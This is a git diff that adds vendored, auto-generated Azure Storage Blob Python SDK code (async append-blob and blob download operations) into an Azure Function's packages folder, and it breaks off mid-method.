ignore + + + @distributed_trace_async + async def append_block( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: 
Optional["_models.LeaseAccessConditions"] = None, + append_position_access_conditions: Optional["_models.AppendPositionAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Append Block operation commits a new block of data to the end of an existing append blob. + The Append Block operation is permitted only if the blob was created with x-ms-blob-type set to + AppendBlob. Append Block is supported only on version 2015-02-21 version or later. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _max_size = None + _append_position = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_append_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.append_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + 
response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def append_block_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url: str, + content_length: int, + source_range: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + source_contentcrc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + request_id_parameter: Optional[str] = None, + copy_source_authorization: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + append_position_access_conditions: Optional["_models.AppendPositionAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Append Block operation commits a new block of data to the end of an existing append blob + where the contents are read from a source url. The Append Block operation is permitted only if + the blob was created with x-ms-blob-type set to AppendBlob. Append Block is supported only on + version 2015-02-21 version or later. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param content_length: The length of the request. + :type content_length: long + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. 
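Unlike append_block, this variant never moves the bytes through the client: the service reads the given range from source_url itself. A hedged sketch via the public append_block_from_url wrapper, assuming dest is an authenticated aio BlobClient for an append blob; the source URL is a placeholder, and a SAS or a copy_source_authorization bearer token would be needed for a private source:

async def splice_from_source(dest) -> None:
    # source_offset/source_length map to the source_range header documented
    # above; the destination service fetches those bytes directly, so no
    # data crosses the client.
    await dest.append_block_from_url(
        "https://<src-account>.blob.core.windows.net/src/big.bin?<sas>",  # placeholder
        source_offset=0,
        source_length=4 * 1024 * 1024,
    )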
+ :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _max_size = None + _append_position = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if 
source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_append_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + source_url=source_url, + content_length=content_length, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.append_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # 
type: ignore + + + @distributed_trace_async + async def seal( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + append_position_access_conditions: Optional["_models.AppendPositionAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Seal operation seals the Append Blob to make it read-only. Seal is supported only on + version 2019-12-12 version or later. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :keyword comp: comp. Default value is "seal". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "seal") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _append_position = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + if append_position_access_conditions is not None: + _append_position = append_position_access_conditions.append_position + + request = build_seal_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + append_position=_append_position, + template_url=self.seal.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in 
[200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + seal.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_blob_operations.py new file mode 100644 index 0000000..5ee65f2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_blob_operations.py @@ -0,0 +1,2905 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... 
import models as _models +from ..._vendor import _convert_request +from ...operations._blob_operations import build_abort_copy_from_url_request, build_acquire_lease_request, build_break_lease_request, build_change_lease_request, build_copy_from_url_request, build_create_snapshot_request, build_delete_immutability_policy_request, build_delete_request, build_download_request, build_get_account_info_request, build_get_properties_request, build_get_tags_request, build_query_request, build_release_lease_request, build_renew_lease_request, build_set_expiry_request, build_set_http_headers_request, build_set_immutability_policy_request, build_set_legal_hold_request, build_set_metadata_request, build_set_tags_request, build_set_tier_request, build_start_copy_from_url_request, build_undelete_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class BlobOperations: # pylint: disable=too-many-public-methods + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def download( + self, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + range: Optional[str] = None, + range_get_content_md5: Optional[bool] = None, + range_get_content_crc64: Optional[bool] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> IO: + """The Download operation reads or downloads a blob from the system, including its metadata and + properties. You can also call Download to read a snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param range_get_content_md5: When set to true and specified together with the Range, the + service returns the MD5 hash for the range, as long as the range is less than or equal to 4 MB + in size. Default value is None. 
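The range/range_get_content_md5 pair documented above corresponds, in the public API, to a ranged download_blob call with validate_content=True (the per-range MD5 the service returns is only available for ranges of at most 4 MB, as noted). A sketch, assuming blob is an authenticated aio BlobClient:

async def read_first_chunk(blob) -> bytes:
    # offset/length become the Range header; validate_content=True asks the
    # service for the per-range Content-MD5 and verifies it client-side,
    # which is why the range must stay at or under 4 MB.
    downloader = await blob.download_blob(
        offset=0,
        length=4 * 1024 * 1024,
        validate_content=True,
    )
    return await downloader.readall()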
+ :type range_get_content_md5: bool + :param range_get_content_crc64: When set to true and specified together with the Range, the + service returns the CRC64 hash for the range, as long as the range is less than or equal to 4 + MB in size. Default value is None. + :type range_get_content_crc64: bool + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_download_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + range=range, + lease_id=_lease_id, + range_get_content_md5=range_get_content_md5, + range_get_content_crc64=range_get_content_crc64, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.download.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + 
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + 
response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + 
